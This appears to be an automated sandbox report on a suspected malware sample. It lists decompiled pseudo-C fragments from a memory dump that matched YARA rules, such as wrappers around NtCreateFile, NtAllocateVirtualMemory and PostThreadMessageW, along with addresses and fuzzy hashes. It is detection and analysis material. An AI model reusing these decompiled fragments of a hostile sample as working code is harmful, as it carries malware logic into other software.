				_t3 = _t17 + 0xc40; // 0xc40
				E0041A960(_t34, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t23 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t23;
			}




                                      0x00419d5c
                                      0x00419d63
                                      0x00419d6f
                                      0x00419d77
                                      0x00419dad
                                      0x00419db1

                                      APIs
                                      • NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362227114.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: 92bb61d1afa872df51073363e93a6660ee49a63918bacf712a2bddfb23e2c6f2
                                      • Instruction ID: a1f1650daadb6676338ca79c4c2de27240f9a71ece0a713dd86054079629f554
                                      • Opcode Fuzzy Hash: 92bb61d1afa872df51073363e93a6660ee49a63918bacf712a2bddfb23e2c6f2
                                      • Instruction Fuzzy Hash: 7F01A4B2201108AFCB08CF98DC85EEB77A9EF8C754F168248FA0DD7240D630E851CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00419D60, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00419D60(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E0041A960(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                      0x00419d6f
                                      0x00419d77
                                      0x00419dad
                                      0x00419db1

                                      APIs
                                      • NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362227114.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                      • Instruction ID: 5d405ca8330a7760d33d8cb8f94c0e61ce0ec213ce21d6c827413d184fac496c
                                      • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                      • Instruction Fuzzy Hash: F1F0B2B2211208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00419DB2, Relevance: 1.5, APIs: 1, Instructions: 30filenativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362227114.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: e4a45a0148bfff756c8a5383a238794a8f00c363e748108148ed18c5256569a3
                                      • Instruction ID: cf413ca206411ff2d18a75db46b5d0f02268d6945be3a9f3b5373e53e49f88d9
                                      • Opcode Fuzzy Hash: e4a45a0148bfff756c8a5383a238794a8f00c363e748108148ed18c5256569a3
                                      • Instruction Fuzzy Hash: 58E01AB3304904AB8B04CF98EC95CE773A9EFCC210700850DFA19C7200C531E8518BA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00419F40, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB34,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F79
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362227114.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateMemoryVirtual
                                      • String ID:
                                      • API String ID: 2167126740-0
                                      • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                      • Instruction ID: 9c08e1581e5817f7e91e4b21b7a397560e598f802d56d9274a49c90b7c070efe
                                      • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                      • Instruction Fuzzy Hash: 1EF015B2210208ABCB14DF89CC81EEB77ADEF88754F158549BE08A7241C630F810CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00419E8B, Relevance: 1.5, APIs: 1, Instructions: 22nativeCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 82%
                                      			E00419E8B(void* __eax, void* __ecx, intOrPtr _a4, void* _a8) {
				char _v1;
				long _t10;
				void* _t15;

				_push( &_v1);
				_t7 = _a4;
				_t2 = _t7 + 0x10; // 0x300
				_t3 = _t7 + 0xc50; // 0x40a923
				E0041A960(_t15, _a4, _t3,  *_t2, 0, 0x2c);
				_t10 = NtClose(_a8); // executed
				return _t10;
			}






                                      0x00419e90
                                      0x00419e93
                                      0x00419e96
                                      0x00419e9f
                                      0x00419ea7
                                      0x00419eb5
                                      0x00419eb9

                                      APIs
                                      • NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362227114.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: Close
                                      • String ID:
                                      • API String ID: 3535843008-0
                                      • Opcode ID: 2b5f63a0f62bb7ea1f5768f459980a3a19115944dcf0dac96dca76d247912688
                                      • Instruction ID: 35377d4d56e4772cf1cafe64b969b096f062b47318e011255c6794c19f79d5da
                                      • Opcode Fuzzy Hash: 2b5f63a0f62bb7ea1f5768f459980a3a19115944dcf0dac96dca76d247912688
                                      • Instruction Fuzzy Hash: 52E0C2712401046BD710DFA4CC84EE77BA9EF48361F158A5AF90CEB282C530E9008690
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00419E90, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00419E90(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a923
				E0041A960(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                      0x00419e93
                                      0x00419e96
                                      0x00419e9f
                                      0x00419ea7
                                      0x00419eb5
                                      0x00419eb9

                                      APIs
                                      • NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362227114.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: Close
                                      • String ID:
                                      • API String ID: 3535843008-0
                                      • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                      • Instruction ID: e68336ecf97fcbff1cce52d5eab911d0c0d253976a6ab71543f56f2ca0e2158f
                                      • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                      • Instruction Fuzzy Hash: 6CD012752002146BD710EB99CC85ED7776CEF44760F154459BA5C5B242C530F55086E0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 019B99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 14178747a0483e2a0d86ca625ada06eb685170d18c9d65cf97a402b95c353934
                                      • Instruction ID: 98528293f29435077d5f91abe3b2da7f73907179604c6fc43cc38186773b0001
                                      • Opcode Fuzzy Hash: 14178747a0483e2a0d86ca625ada06eb685170d18c9d65cf97a402b95c353934
                                      • Instruction Fuzzy Hash: 509002B178110442D20061994414B064085E7E1781F51C029E1494594DC659CC5271A7
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 019B9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 68fa2a29da811b754005eccf7c055e6a3dcdcbcc3ff763589ebb62d687abdbd3
                                      • Instruction ID: f5c4056b28495e6d3cb2349dfb725b76864aa990669511b674e92f9f86a17a71
                                      • Opcode Fuzzy Hash: 68fa2a29da811b754005eccf7c055e6a3dcdcbcc3ff763589ebb62d687abdbd3
                                      • Instruction Fuzzy Hash: 3C9002B164110402D240719944047464085A7D0781F51C025A5494594EC6998DD576E6
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 019B98F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: a95888832f5fc4eb25d8446fcb4623a108f524ee392352308ad5927f9257127b
                                      • Instruction ID: 3d74b7b3c31746c8be36866e9841a9e88b1707f6e98fd94f06b4db9556deffd6
                                      • Opcode Fuzzy Hash: a95888832f5fc4eb25d8446fcb4623a108f524ee392352308ad5927f9257127b
                                      • Instruction Fuzzy Hash: 07900271A4110502D20171994404616408AA7D06C1F91C036A1454595ECA658992B1B2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 019B9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 0954171cccfa866c7b49a95c242f10c54ec4d56c31e96ba8a8ba532dfd89a1b1
                                      • Instruction ID: 417c0c10cf10d461928674f504659498744d30e6858d19d43ee26cce21075613
                                      • Opcode Fuzzy Hash: 0954171cccfa866c7b49a95c242f10c54ec4d56c31e96ba8a8ba532dfd89a1b1
                                      • Instruction Fuzzy Hash: 92900271682141525645B19944045078086B7E06C1791C026A1844990CC5669856E6A2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 019B9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: c08651c66f04c77e8288520548dd5a452b57c94c121010bfc9a9628569f02a57
                                      • Instruction ID: 766af965636845f1379f8bb80e92fee878e091f9d1146ac24cb27551420ea530
                                      • Opcode Fuzzy Hash: c08651c66f04c77e8288520548dd5a452b57c94c121010bfc9a9628569f02a57
                                      • Instruction Fuzzy Hash: 9890027164110413D211619945047074089A7D06C1F91C426A0854598DD6968952B1A2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 019B9A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 0c0331ef102d658ca9599ab9d6f48785d637d214207b3d6e132cb25104107c0a
                                      • Instruction ID: a56f2e439d07f9f59b86af82b34b38fece877204354b525c0a39fb25d01a857d
                                      • Opcode Fuzzy Hash: 0c0331ef102d658ca9599ab9d6f48785d637d214207b3d6e132cb25104107c0a
                                      • Instruction Fuzzy Hash: 4190027164150402D2006199481470B4085A7D0782F51C025A1594595DC665885175F2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 019B9A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: c4d1b3cb901b51ca0f7f93bf41918a454f91b0ebfb7666f335f22eae5a3fee09
                                      • Instruction ID: 212e8963b102ae4b9e38d484a372d20e49140eb87fdd38f4000efc7110b7a646
                                      • Opcode Fuzzy Hash: c4d1b3cb901b51ca0f7f93bf41918a454f91b0ebfb7666f335f22eae5a3fee09
                                      • Instruction Fuzzy Hash: 57900271A4110042424071A988449068085BBE1691751C135A0DC8590DC599886566E6
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 019B9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 9eba1a26c50935ab0ca660bdf0d3c0bc41e5b356592c903860ed663503a40a16
                                      • Instruction ID: 65860a4bd7497321ddf0b1400f90560849e1b812fba8c21a653525ffa1dff083
                                      • Opcode Fuzzy Hash: 9eba1a26c50935ab0ca660bdf0d3c0bc41e5b356592c903860ed663503a40a16
                                      • Instruction Fuzzy Hash: 2990027165190042D30065A94C14B074085A7D0783F51C129A0584594CC955886165A2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 019B95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 76f9248da5dc3b8228828317789b3ba88ab3e446cf1a2040098bba5a2ca3ca53
                                      • Instruction ID: aca785886801314925750a3f3ef15b972f091a363c307944b28a5c2b60d8a6d7
                                      • Opcode Fuzzy Hash: 76f9248da5dc3b8228828317789b3ba88ab3e446cf1a2040098bba5a2ca3ca53
                                      • Instruction Fuzzy Hash: FE9002B164210003420571994414616808AA7E0681B51C035E14445D0DC565889171A6
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 019B9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: cb78eb676c49692493915c8cdf96aa4f365676105f4f8b77f1161dacbc293f11
                                      • Instruction ID: ec8475434d5be8865a90ec4409a8f815c346b6e6b96470c9ae09d136edbb3119
                                      • Opcode Fuzzy Hash: cb78eb676c49692493915c8cdf96aa4f365676105f4f8b77f1161dacbc293f11
                                      • Instruction Fuzzy Hash: 45900275651100030205A599070450740C6A7D57D1351C035F1445590CD661886161A2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 019B9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: da81d4dd13c186692c53dc3df80bdfbccef7b02031c33049b1912dd49b6aab4b
                                      • Instruction ID: cc28e43d3b7e8b89d85f84b3419af64cad43ea7393f230816a6210d040490894
                                      • Opcode Fuzzy Hash: da81d4dd13c186692c53dc3df80bdfbccef7b02031c33049b1912dd49b6aab4b
                                      • Instruction Fuzzy Hash: 3890027965310002D2807199540860A4085A7D1682F91D429A0445598CC955886963A2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 019B97A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 09c38d568559c6b3168ee947ebf255f5eb3412a8407bc7ae24d6ea237338e21c
                                      • Instruction ID: bc93be3a73162f47519c86f294200628201d803fcbf1011ee2ae7847905c3038
                                      • Opcode Fuzzy Hash: 09c38d568559c6b3168ee947ebf255f5eb3412a8407bc7ae24d6ea237338e21c
                                      • Instruction Fuzzy Hash: 4B90027174110003D240719954186068085F7E1781F51D025E0844594CD955885662A3
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 019B9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 48bb5abcc050d36631dc76c396881abe909246f9f79de0e3aa6ea1b09939fbc8
                                      • Instruction ID: 53a7433d9c278273d14623c4d96abfc155c5cbcd8ff6c787ffcaed6bfb18711f
                                      • Opcode Fuzzy Hash: 48bb5abcc050d36631dc76c396881abe909246f9f79de0e3aa6ea1b09939fbc8
                                      • Instruction Fuzzy Hash: 1B90027164110402D20065D954086464085A7E0781F51D025A5454595EC6A5889171B2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 019B96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 2a22b8ab18fd092825f885bd739853fbd021e0bd713956ceb4b1bfac7debd5c4
                                      • Instruction ID: d08d464606fb4e5edb7ea8dce8fe20a6d8077bb5782d7aa58a0a0a54c10347c4
                                      • Opcode Fuzzy Hash: 2a22b8ab18fd092825f885bd739853fbd021e0bd713956ceb4b1bfac7debd5c4
                                      • Instruction Fuzzy Hash: 5F90027164118802D2106199840474A4085A7D0781F55C425A4854698DC6D5889171A2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 019B9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 35d284351da3c363dbc2b1cafcfff7cf16c88cdc3204d7af9d99d3425dbeb389
                                      • Instruction ID: 1fdba88431f1f8a1ebc6f185cd6553e7d1595c1d4dec56842b9a13bfa020b918
                                      • Opcode Fuzzy Hash: 35d284351da3c363dbc2b1cafcfff7cf16c88cdc3204d7af9d99d3425dbeb389
                                      • Instruction Fuzzy Hash: D390027164110802D2807199440464A4085A7D1781F91C029A0455694DCA558A5977E2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00409A90, Relevance: .1, Instructions: 92COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362227114.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1da3a0a51de53f8e4f95f41efafe70bd92c6e1b826fb8f0c5d51986441d80343
                                      • Instruction ID: 3804b4b6881f0f279124858c5e35b72bf87e4fbc11d5a75f000cd7e24852ad46
                                      • Opcode Fuzzy Hash: 1da3a0a51de53f8e4f95f41efafe70bd92c6e1b826fb8f0c5d51986441d80343
                                      • Instruction Fuzzy Hash: 64213CB2D4020857CB25D664AD42AEF737CEB54308F04017FE949A3182F7387E49CBA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041A0A2, Relevance: 3.0, APIs: 2, Instructions: 40memoryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 46%
                                      			E0041A0A2(intOrPtr _a4, int _a8) {
				void* _t7;
				void* _t14;
				void* _t15;
				signed int _t17;

				_t17 =  *(_t7 + _t15 - 0x32a4c092) * 0xaa238cd7;
				asm("loope 0xffffffc5");
				_push(_t17);
				_t8 = _a4;
				_push(_t15);
				E0041A960(_t14, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t8 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}







                                      0x0041a0a2
                                      0x0041a0ad
                                      0x0041a0b0
                                      0x0041a0b3
                                      0x0041a0bc
                                      0x0041a0ca
                                      0x0041a0d8

                                      APIs
                                      • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D
                                      • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0D8
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362227114.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: ExitFreeHeapProcess
                                      • String ID:
                                      • API String ID: 1180424539-0
                                      • Opcode ID: cd7eb55a236e98b5228f68f9edf995bd3f8c7b19bce9d64624c8139366574038
                                      • Instruction ID: 7f0b450337cb1d9e312d15a0d45f7cd1e5f482f333951aedd4788d1067318705
                                      • Opcode Fuzzy Hash: cd7eb55a236e98b5228f68f9edf995bd3f8c7b19bce9d64624c8139366574038
                                      • Instruction Fuzzy Hash: 81F0D1B52002046FD714DF64CC86EE33B68EF88310F05895AB99C6B242C138EA548BA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004082E8, Relevance: 1.6, APIs: 1, Instructions: 58threadwindowCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 57%
                                      			E004082E8(void* __eflags, long _a8) {
				char _v63;
				char _v64;
				void* _t12;
				int _t13;
				void* _t16;
				long _t21;
				int _t26;
				void* _t28;
				void* _t30;
				void* _t32;
				void* _t37;

				_t37 = __eflags;
				asm("lahf");
				_t32 = _t28;
				_pop(_t29);
				asm("insd");
				asm("invalid");
				_t30 = _t32;
				_v64 = 0;
				E0041B860( &_v63, 0, 0x3f);
				E0041C400( &_v64, 3);
				_t12 = E0040ACD0(_t16, _t37, _a8 + 0x1c,  &_v64); // executed
				_t13 = E00414E20(_a8 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t26 = _t13;
				if(_t26 != 0) {
					_t21 = _a8;
					_t13 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t39 = _t13;
					if(_t13 == 0) {
						_t13 =  *_t26(_t21, 0x8003, _t30 + (E0040A460(_t39, 1, 8) & 0x000000ff) - 0x40, _t13);
					}
				}
				return _t13;
			}














                                      0x004082e8
                                      0x004082e8
                                      0x004082e9
                                      0x004082e9
                                      0x004082ea
                                      0x004082eb
                                      0x004082f1
                                      0x004082ff
                                      0x00408303
                                      0x0040830e
                                      0x0040831e
                                      0x0040832e
                                      0x00408333
                                      0x0040833a
                                      0x0040833d
                                      0x0040834a
                                      0x0040834c
                                      0x0040834e
                                      0x0040836b
                                      0x0040836b
                                      0x0040836d
                                      0x00408372

                                      APIs
                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362227114.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: MessagePostThread
                                      • String ID:
                                      • API String ID: 1836367815-0
                                      • Opcode ID: 254b544da7d2242acce9de39aea732c9afe921684c1b340b60641dc3eb0e17fa
                                      • Instruction ID: bf8077a32ed0adc5b67e66be52a5cedd9e6db5d7258992f6927f362b774b4f35
                                      • Opcode Fuzzy Hash: 254b544da7d2242acce9de39aea732c9afe921684c1b340b60641dc3eb0e17fa
                                      • Instruction Fuzzy Hash: D201D831A8021877E721AAA59C43FFF772CAF40F54F05411EFF04BA1C1E6E9691646EA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004082F0, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 82%
                                      			E004082F0(void* __ebx, void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t22;
				intOrPtr* _t26;
				void* _t27;
				void* _t31;

				_t31 = __eflags;
				_v68 = 0;
				E0041B860( &_v67, 0, 0x3f);
				E0041C400( &_v68, 3);
				_t12 = E0040ACD0(__ebx, _t31, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00414E20(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t26 = _t13;
				if(_t26 != 0) {
					_t22 = _a8;
					_t14 = PostThreadMessageW(_t22, 0x111, 0, 0); // executed
					_t33 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t26(_t22, 0x8003, _t27 + (E0040A460(_t33, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}












                                      0x004082f0
                                      0x004082ff
                                      0x00408303
                                      0x0040830e
                                      0x0040831e
                                      0x0040832e
                                      0x00408333
                                      0x0040833a
                                      0x0040833d
                                      0x0040834a
                                      0x0040834c
                                      0x0040834e
                                      0x0040836b
                                      0x0040836b
                                      0x00000000
                                      0x0040836d
                                      0x00408372

                                      APIs
                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362227114.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: MessagePostThread
                                      • String ID:
                                      • API String ID: 1836367815-0
                                      • Opcode ID: afab1aa1c4a0f2d606ceb08e1db99e52839e25c93945885a0af06a200761294b
                                      • Instruction ID: 99221eaed4bb2b1c73ef210b546efabe7985b039c1aa6a3efaa8447a865c7254
                                      • Opcode Fuzzy Hash: afab1aa1c4a0f2d606ceb08e1db99e52839e25c93945885a0af06a200761294b
                                      • Instruction Fuzzy Hash: 7601D831A8031876E720A6959C43FFE772C6B40F54F044019FF04BA1C1D6A8691646EA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041A070, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0041A070(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E0041A960(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                      0x0041a07f
                                      0x0041a087
                                      0x0041a09d
                                      0x0041a0a1

                                      APIs
                                      • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362227114.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: FreeHeap
                                      • String ID:
                                      • API String ID: 3298025750-0
                                      • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
